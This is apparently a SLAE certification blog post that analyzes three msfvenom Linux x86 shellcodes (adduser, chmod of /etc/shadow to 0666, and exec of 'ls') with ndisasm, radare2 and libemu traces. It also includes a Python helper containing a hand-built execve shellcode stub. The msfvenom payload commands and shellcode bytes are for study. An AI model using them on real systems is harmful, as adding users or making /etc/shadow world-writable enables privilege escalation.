SLAEx86 : Analyzing Shellcode

In this blog post I will analyze three Linux x86 shellcodes generated with msfvenom, using ndisasm for static analysis and r2 and libemu for dynamic analysis.

Shellcode 1: linux/x86/adduser shellcode
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/adduser USER=slae PASS=slaeslae -i0 -fc

Static Analysis
The first pass is static: the raw bytes are fed to ndisasm to recover the instructions from the hex string.


Dynamic Analysis
r2 disassembly

libemu was of little use for this shellcode: it produced neither equivalent C code nor a call graph. That is a limit of the emulator rather than a sign that the payload is broken; libemu only models the syscalls it has hooks for, and its analysis goes no further than the first one it does not understand.

Shellcode 2: linux/x86/chmod shellcode
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/chmod FILE=/etc/shadow MODE=0666 -i0 -fc

Static Analysis
The first pass is static: the raw bytes are fed to ndisasm to recover the instructions from the hex string.

Dynamic Analysis
r2 disassembly

Call graph and trace generated by libemu (sctest) emulation

stepcount 12
[emu 0x0x88f3078 debug ] cpu state    eip=0x00417026
[emu 0x0x88f3078 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a
[emu 0x0x88f3078 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x88f3078 debug ] Flags:
ERROR  chmod (
) =  -1;
ERROR  exit (
     int status = 4288522;
) =  -1;

The final register state already tells the story: ecx=0x1b6 is 438 decimal, i.e. the MODE argument 0666 in octal, and ebx=0x41700a points into the shellcode buffer itself (libemu loads the shellcode at 0x417000), where the FILE string /etc/shadow is embedded. The two ERROR lines do not mean the syscalls failed on a real system; they mean libemu has no hook for chmod or exit and reports them as unresolved. The odd exit status 4288522 is simply 0x41700a, the string pointer still sitting in ebx when the exit syscall was reached, since the payload never reloads ebx after the chmod call.

Shellcode 3: linux/x86/exec
Command Used : msfvenom --platform linux --arch x86 --payload linux/x86/exec CMD=ls -i0 -fc

While analyzing this shellcode I noticed that lines 22 and 23 of the ndisasm listing are wrong: the bytes 6C 73 were decoded as instructions, but they are data, the hex representation of the ASCII string "ls", i.e. the CMD argument. The payload places that string immediately after a call instruction, so the return address the call pushes is a pointer to the string; a linear disassembler such as ndisasm has no way to know this and decodes the string bytes as opcodes. libemu, which actually emulates the code, is not fooled and produced correct equivalent code for the shellcode.
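To see why a linear disassembler trips over this, here is a small Python helper, added for this write-up and not part of the original post or of Metasploit, that parses msfvenom's -f c output into raw bytes and applies two byte-level heuristics: spotting a call that jumps forward over a printable string (the trick described above), and recovering strings that are built on the stack with push immediates. The shellcode bytes embedded in it are a constructed, hand-assembled execve("/bin/sh", ["/bin/sh","-c","ls"]) stub laid out like linux/x86/exec, not the exact bytes msfvenom emitted for this post (those are not on the page), and the -k start,len option it prints is ndisasm's way of treating a byte range as data instead of code.

```python
import re

# Constructed sample, NOT the bytes msfvenom emitted for the post: a hand-assembled
# linux/x86 execve("/bin/sh", ["/bin/sh", "-c", "ls"], NULL) stub in msfvenom's
# "-f c" output format, laid out the way linux/x86/exec builds its arguments
# (strings pushed as immediates, the CMD string embedded right after a call).
SHELLCODE_C = (
    'unsigned char buf[] = \n'
    '"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\\x2f\\x73\\x68"\n'
    '"\\x00\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\xe8\\x03\\x00\\x00\\x00\\x6c"\n'
    '"\\x73\\x00\\x57\\x53\\x89\\xe1\\xcd\\x80";\n'
)


def parse_c_shellcode(text):
    """Convert msfvenom -f c output ("\\x6a\\x0b..." string literals) to raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def is_printable(data):
    """True for a non-empty run of printable ASCII bytes."""
    return bool(data) and all(32 <= b < 127 for b in data)


def find_call_over_data(code):
    """Find E8 rel32 calls that jump forward over a printable string.

    This is the pattern that fooled ndisasm: the string sits between the call
    and its target, and the return address the call pushes is the pointer to it.
    Returns (call_offset, data_offset, data_bytes, target_offset) tuples.
    """
    hits = []
    for off in range(len(code) - 4):
        if code[off] != 0xE8:
            continue
        rel = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
        data_start = off + 5
        target = data_start + rel
        if rel <= 0 or target > len(code):
            continue
        skipped = code[data_start:target]
        if is_printable(skipped.rstrip(b"\x00")):
            hits.append((off, data_start, skipped, target))
    return hits


def pushed_strings(code):
    """Recover strings built on the stack with push imm32 (68) / push imm16 (66 68).

    Byte-level heuristic, not a real decoder: it scans for the push opcodes and
    skips over their immediates. Returns (offset, bytes) for each printable
    immediate. Because the stack grows down, consecutive pushes show up here in
    reverse string order ("/sh" before "/bin" for "/bin/sh").
    """
    found = []
    i = 0
    while i < len(code):
        if code[i] == 0x68 and i + 5 <= len(code):
            imm, size = code[i + 1:i + 5], 5
        elif code[i] == 0x66 and i + 4 <= len(code) and code[i + 1] == 0x68:
            imm, size = code[i + 2:i + 4], 4
        else:
            i += 1
            continue
        body = imm.rstrip(b"\x00")
        if is_printable(body):
            found.append((i, body))
        i += size
    return found


def ndisasm_skip_args(code):
    """Build ndisasm -k start,len arguments so the embedded strings are reported
    as skipped data instead of being decoded as instructions."""
    return ["-k %d,%d" % (data, target - data)
            for _, data, _, target in find_call_over_data(code)]


if __name__ == "__main__":
    sc = parse_c_shellcode(SHELLCODE_C)
    print("%d bytes of shellcode" % len(sc))
    for call, data, blob, target in find_call_over_data(sc):
        print("call at 0x%02x skips %r at 0x%02x, returns to 0x%02x" % (call, blob, data, target))
    for off, s in pushed_strings(sc):
        print("push at 0x%02x builds %r" % (off, s))
    print("suggested: ndisasm -b 32", *ndisasm_skip_args(sc), "shellcode.bin")
```

Run it on the constructed sample and it reports the call at offset 0x18 skipping "ls\0" at offset 0x1d (the same offset at which libemu finds the "ls" argument, 0x41701d, in the run below), plus "-c", "/sh" and "/bin" being pushed to build the argv strings. The same parse-then-scan approach works on any msfvenom -f c output; only the sample bytes here are constructed.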

Static Analysis
The first pass is static: the raw bytes are fed to ndisasm to recover the instructions from the hex string.


Dynamic Analysis
r2 disassembly

Call graph and trace generated by libemu (sctest) emulation

stepcount 15
[emu 0x0x975d078 debug ] cpu state    eip=0x00417028
[emu 0x0x975d078 debug ] eax=0x0000000b  ecx=0x00416fb0  edx=0x00000000  ebx=0x00416fc0
[emu 0x0x975d078 debug ] esp=0x00416fb0  ebp=0x00000000  esi=0x00000000  edi=0x00416fc8
[emu 0x0x975d078 debug ] Flags:
int execve (
     const char * dateiname = 0x00416fc0 =>
           = "/bin/sh";
     const char * argv[] = [
           = 0x00416fb0 =>
               = 0x00416fc0 =>
                   = "/bin/sh";
           = 0x00416fb4 =>
               = 0x00416fc8 =>
                   = "-c";
           = 0x00416fb8 =>
               = 0x0041701d =>
                   = "ls";
           = 0x00000000 =>
             none;
     ];
     const char * envp[] = 0x00000000 =>
         none;
) =  0;

The register state matches an execve call exactly: eax=0xb is the execve syscall number, ebx points at "/bin/sh", ecx points at the argv array on the stack and edx=0 is the NULL envp. Note where argv[2] lives: 0x0041701d is inside the shellcode buffer (libemu loads it at 0x417000), so the "ls" string is embedded 0x1d bytes into the code. That is precisely the region ndisasm decoded as instructions, while the emulator, following the real control flow, used it as data.

This blog post has been created for completing the requirements of SecurityTube Linux Assembly Expert Certification: http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: PA-1191